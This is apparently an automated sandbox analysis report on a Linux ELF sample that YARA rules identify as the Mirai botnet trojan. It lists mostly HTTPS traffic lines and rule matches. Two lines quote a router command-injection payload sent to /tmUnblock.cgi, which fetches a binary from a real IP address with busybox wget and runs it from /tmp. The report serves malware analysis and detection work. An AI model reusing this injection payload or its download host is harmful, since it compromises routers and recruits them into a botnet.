      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34562 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40482
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
      Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
      Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
      Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
      Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
      Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40468
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
      Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39470
      Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39474
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
      Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39476
      Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40458
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40452
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
      Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
      Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
      Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
      Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52432
      Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52430
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
      Source: unknownNetwork traffic detected: HTTP traffic on port 40482 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
      Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
      Source: unknownNetwork traffic detected: HTTP traffic on port 40012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52442
      Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
      Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52444
      Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
      Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
      Source: unknownNetwork traffic detected: HTTP traffic on port 54142 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
      Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52454
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52452
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52458
      Source: unknownNetwork traffic detected: HTTP traffic on port 40024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33670 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53286 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
      Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
      Source: unknownNetwork traffic detected: HTTP traffic on port 33200 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52464
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52472
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52470
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40494
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40498
      Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53274 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37660 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47450 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53308 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60074 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42638 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54154 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
      Source: unknownNetwork traffic detected: HTTP traffic on port 51994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
      Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44472 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
      Source: unknownNetwork traffic detected: HTTP traffic on port 53250 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58132 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47508 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42626 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44460 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46508 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43472 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
      Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35562 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
      Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40362 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
      Source: unknownNetwork traffic detected: HTTP traffic on port 46690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
      Source: unknownNetwork traffic detected: HTTP traffic on port 34934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51490 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39620
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39622
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39624
      Source: unknownNetwork traffic detected: HTTP traffic on port 55130 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40604
      Source: unknownNetwork traffic detected: HTTP traffic on port 34910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40350 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40602
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39616
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40608
      Source: unknownNetwork traffic detected: HTTP traffic on port 60542 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
      Source: unknownNetwork traffic detected: HTTP traffic on port 57612 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45628 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57360 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39610
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39612
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39604
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
      Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39606
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41928
      Source: unknownNetwork traffic detected: HTTP traffic on port 41458 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41924
      Source: unknownNetwork traffic detected: HTTP traffic on port 42110 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41920
      Source: unknownNetwork traffic detected: HTTP traffic on port 45556 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53478 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60554 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42122 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41918
      Source: unknownNetwork traffic detected: HTTP traffic on port 57624 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39602
      Source: unknownNetwork traffic detected: HTTP traffic on port 34200 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41916
      Source: unknownNetwork traffic detected: HTTP traffic on port 55840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41910
      Source: unknownNetwork traffic detected: HTTP traffic on port 38288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58624 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35586 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33404 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39132 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42580 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41900
      Source: unknownNetwork traffic detected: HTTP traffic on port 54274 -> 443

      System Summary

      barindex
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.142.182.103/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0POST /tmUnblock.cgi HTTP/1.1
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 86O41HaCl5.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
